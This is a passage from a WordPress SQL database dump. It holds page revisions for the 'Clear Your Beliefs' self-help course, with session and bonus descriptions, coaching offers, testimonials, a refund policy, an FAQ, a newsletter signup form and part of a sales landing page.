love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:23:23', '2014-12-14 19:23:23', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2051, 2, '2014-12-14 14:31:42', '2014-12-14 19:31:42', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-14 14:31:42', '2014-12-14 19:31:42', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2052, 2, '2014-12-14 14:35:57', '2014-12-14 19:35:57', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />			<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the 